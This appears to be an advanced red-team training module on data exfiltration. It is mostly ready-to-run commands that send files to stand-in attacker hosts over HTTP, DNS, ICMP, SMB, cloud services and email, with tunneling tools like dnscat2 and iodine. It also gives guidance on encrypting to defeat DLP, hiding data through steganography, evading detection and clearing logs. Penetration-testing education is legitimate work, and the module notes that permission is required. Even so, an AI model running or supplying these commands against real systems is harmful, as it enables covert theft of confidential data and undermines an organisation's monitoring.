Data Exfiltration Techniques

advanced35 minWriteup

Extracting data while evading detection

Learning Objectives

  • Identify valuable data
  • Choose exfiltration methods
  • Evade DLP systems
  • Cover your tracks

You've found the crown jewels - a database dump, confidential documents, or source code. Now you need to get it out. Data exfiltration is the art of extracting data from a compromised network while evading detection.

In real penetration tests, you might just grab a screenshot of sensitive data. But for red team operations or demonstrating data breach impact, actual exfiltration proves the threat is real.

Engagement Scope

Data exfiltration should be explicitly scoped in your engagement. Never exfiltrate actual sensitive data without written permission. Often, proving access and documenting the data is sufficient.

Identifying Valuable Data

Know what to look for:

  • Databases: Customer data, credentials, financial records
  • Source Code: Proprietary applications, configs with secrets
  • Documents: Contracts, HR files, strategic plans
  • Credentials: Password files, SSH keys, certificates
  • Email: Communication, attachments
bash
1606070;"># Find interesting files - Linux
2find / -name 606070;">#a5d6ff;">"*.sql" -o -name "*.bak" -o -name "*.dump" 2>/dev/null
3find / -name 606070;">#a5d6ff;">"*.xlsx" -o -name "*.docx" -o -name "*.pdf" 2>/dev/null
4find / -type f -size +1M -size -100M 2>/dev/null  606070;"># Medium-sized files
5 
6606070;"># Find interesting files - Windows
7dir /s /b *.sql *.bak *.xlsx *.docx *.pst 2>nul
8forfiles /P C:\ /S /M *.doc* /D -30 2>nul  606070;"># Recent docs

HTTP/HTTPS Exfiltration

HTTP is usually allowed through firewalls. HTTPS adds encryption, making inspection harder.

bash
1606070;"># Simple HTTP POST
2curl -X POST -d @secret.txt http:606070;">//attacker.com/receive
3 
4606070;"># Base64 encode first
5base64 secret.txt | curl -X POST -d @- http:606070;">//attacker.com/receive
6 
7606070;"># Using wget
8wget --post-file=secret.txt http:606070;">//attacker.com/receive
9 
10606070;"># Python HTTP server to receive
11python3 -m http.server 8080
12606070;"># Or with upload capability
13python3 -c 606070;">#a5d6ff;">"from http.server import HTTPServer, SimpleHTTPRequestHandler; HTTPServer(('0.0.0.0', 8080), SimpleHTTPRequestHandler).serve_forever()"
14 
15606070;"># PHP receiver script
16606070;"># <?php file_put_contents("data.txt", file_get_contents("php://input")); ?>
17 
18606070;"># PowerShell upload
19Invoke-WebRequest -Uri http:606070;">//attacker.com/receive -Method POST -Body (Get-Content secret.txt)

Chunked Exfiltration

bash
1606070;"># Split large files
2split -b 100K largefile.zip part_
3 
4606070;"># Send chunks
5for f in part_*; do curl -X POST -d @$f http:606070;">//attacker.com/receive?name=$f; done
6 
7606070;"># Reassemble on receiver
8cat part_* > largefile.zip

DNS Exfiltration

DNS is rarely blocked and often unmonitored. Data is encoded in subdomain queries that your DNS server captures.

bash
1606070;"># Encode data as subdomain
2data=$(cat secret.txt | base64 | tr -d 606070;">#a5d6ff;">'\n')
3nslookup $data.exfil.attacker.com
4 
5606070;"># Or xxd for hex encoding
6data=$(cat secret.txt | xxd -p | tr -d 606070;">#a5d6ff;">'\n')
7nslookup $data.exfil.attacker.com
8 
9606070;"># Chunk for length limits (63 chars per label, 253 total)
10cat secret.txt | base64 | fold -w 60 | while read chunk; do
11  nslookup $chunk.exfil.attacker.com
12done
13 
14606070;"># Using iodine for DNS tunnel
15iodined -f -c -P password 10.0.0.1 tunnel.attacker.com  606070;"># Server
16iodine -f -P password tunnel.attacker.com               606070;"># Client
17 
18606070;"># Using dnscat2
19dnscat2-server tunnel.attacker.com  606070;"># Server
20./dnscat tunnel.attacker.com        606070;"># Client

DNS is Sneaky

Most organizations don't monitor DNS queries closely. Even if they do, encoded data in subdomains looks like normal (if odd) DNS traffic. Rate limit to avoid suspicion.

ICMP Exfiltration

Ping packets can carry data in the payload. Often allowed through firewalls for troubleshooting.

bash
1606070;"># Using ping with data
2xxd -p -c 16 secret.txt | while read line; do
3  ping -c 1 -p $line attacker.com
4done
5 
6606070;"># Using icmpsh (ICMP shell)
7606070;"># Attacker
8icmpsh_m.py attacker_ip target_ip
9 
10606070;"># Target
11icmpsh.exe -t attacker_ip
12 
13606070;"># Using ptunnel for ICMP tunnel
14ptunnel -p proxy_host -lp 8000 -da destination -dp 22  606070;"># Client
15ptunnel -x password                                      606070;"># Server

SMB/File Share Exfiltration

bash
1606070;"># Copy to attacker SMB share
2606070;"># First, start SMB server on attacker
3impacket-smbserver share /tmp/share -smb2support
4 
5606070;"># From Windows target
6copy secret.txt \\attacker_ip\share\
7 
8606070;"># From Linux target
9smbclient 606070;">//attacker_ip/share -N -c "put secret.txt"

Cloud Service Exfiltration

Legitimate cloud services blend with normal traffic and are rarely blocked.

bash
1606070;"># Using cloud storage APIs
2606070;"># Dropbox
3curl -X POST https:606070;">//content.dropboxapi.com/2/files/upload \
4  --header 606070;">#a5d6ff;">"Authorization: Bearer TOKEN" \
5  --header 606070;">#a5d6ff;">"Dropbox-API-Arg: {\"path\": \"/secret.txt\"}" \
6  --data-binary @secret.txt
7 
8606070;"># AWS S3 (with credentials)
9aws s3 cp secret.txt s3:606070;">//attacker-bucket/
10 
11606070;"># Google Drive
12606070;"># Using gdrive CLI tool
13gdrive upload secret.txt
14 
15606070;"># Pastebin (small data)
16curl -d 606070;">#a5d6ff;">"api_dev_key=KEY&api_option=paste&api_paste_code=$(cat secret.txt)" \
17  https:606070;">//pastebin.com/api/api_post.php

Leave No Trace

Cloud uploads leave logs on both ends. For covert operations, consider encrypted uploads to services you control, then delete from the cloud.

Email Exfiltration

bash
1606070;"># Using sendmail/mail
2echo 606070;">#a5d6ff;">"Data attached" | mail -s "Report" -A secret.txt attacker@email.com
3 
4606070;"># Using Python
5python3 << 606070;">#a5d6ff;">'EOF'
6import smtplib
7from email.mime.multipart import MIMEMultipart
8from email.mime.base import MIMEBase
9from email import encoders
10 
11msg = MIMEMultipart()
12msg[606070;">#a5d6ff;">'To'] = "attacker@email.com"
13msg[606070;">#a5d6ff;">'Subject'] = "Report"
14 
15with open(606070;">#a5d6ff;">"secret.txt", "rb") as f:
16    part = MIMEBase(606070;">#a5d6ff;">'application', 'octet-stream')
17    part.set_payload(f.read())
18    encoders.encode_base64(part)
19    part.add_header(606070;">#a5d6ff;">'Content-Disposition', 'attachment', filename="report.txt")
20    msg.attach(part)
21 
22smtp = smtplib.SMTP(606070;">#a5d6ff;">'localhost', 25)
23smtp.send_message(msg)
24EOF
25 
26606070;"># PowerShell
27Send-MailMessage -From 606070;">#a5d6ff;">"user@company.com" -To "attacker@email.com" \
28  -Subject 606070;">#a5d6ff;">"Report" -Attachments "secret.txt" -SmtpServer "mail.company.com"

Encryption Before Exfiltration

bash
1606070;"># Encrypt with openssl
2openssl enc -aes-256-cbc -salt -in secret.txt -out secret.enc -pass pass:password
3 
4606070;"># Decrypt on attacker machine
5openssl enc -aes-256-cbc -d -in secret.enc -out secret.txt -pass pass:password
6 
7606070;"># Using GPG
8gpg -c --cipher-algo AES256 secret.txt  606070;"># Symmetric encryption
9gpg -d secret.txt.gpg > secret.txt      606070;"># Decrypt
10 
11606070;"># Compress and encrypt
12tar czf - secret_folder/ | openssl enc -aes-256-cbc -out archive.enc
13 
14606070;"># 7zip with password (Windows)
157z a -pPASSWORD archive.7z secret.txt

Always Encrypt

Encrypted data prevents DLP inspection and protects the data during transit. Even if captured, encrypted data is useless without the key.

Steganography

Hide data inside innocent-looking files like images.

bash
1606070;"># Using steghide
2steghide embed -cf image.jpg -ef secret.txt -p password
3steghide extract -sf image.jpg -p password
4 
5606070;"># Simple concatenation
6cat image.jpg secret.zip > image_with_data.jpg
7606070;"># To extract: binwalk -e image_with_data.jpg
8 
9606070;"># Using outguess
10outguess -k 606070;">#a5d6ff;">"password" -d secret.txt cover.jpg stego.jpg
11 
12606070;"># Using strings to hide in text
13606070;"># Encode in whitespace, zero-width characters, etc.

Evading Detection

  • Timing: Exfiltrate slowly during business hours
  • Encryption: Prevent content inspection
  • Common Protocols: Use HTTP, DNS, HTTPS
  • Chunking: Small packets blend with normal traffic
  • Legitimate Services: Cloud storage, email
  • Encoding: Base64, hex to avoid pattern matching

Think Like a Defender

What would trigger an alert? Large file transfers, unusual protocols, transfers to known-bad IPs, after-hours activity. Avoid these patterns.

Data Exfiltration Methodology

Exfiltration Process

1
IdentifyFind valuable data worth exfiltrating
2
StageCopy data to a single location
3
CompressReduce size with zip/tar
4
EncryptProtect data and evade DLP
5
Choose ChannelHTTP, DNS, ICMP, cloud, email
6
ExfiltrateSend data, possibly in chunks
7
Clean UpRemove staged files, clear logs

Knowledge Check

Quick Quiz
Question 1 of 3

Why is DNS exfiltration effective?

Challenges

HTTP Exfiltration

Challenge
🌱 beginner

Set up an HTTP receiver and exfiltrate a file from a compromised Linux system.

Need a hint? (4 available)

DNS Exfiltration

Challenge
🔥 intermediate

Exfiltrate a small text file using DNS queries to a server you control.

Need a hint? (4 available)

Key Takeaways

  • Always get explicit permission before exfiltrating data
  • HTTP/HTTPS is usually allowed and blends with normal traffic
  • DNS exfiltration is stealthy - rarely blocked or monitored
  • Encrypt data before exfiltration to evade DLP
  • Chunk large files and transfer slowly to avoid detection
  • Cloud services provide legitimate-looking channels
  • Clean up staged files and logs after exfiltration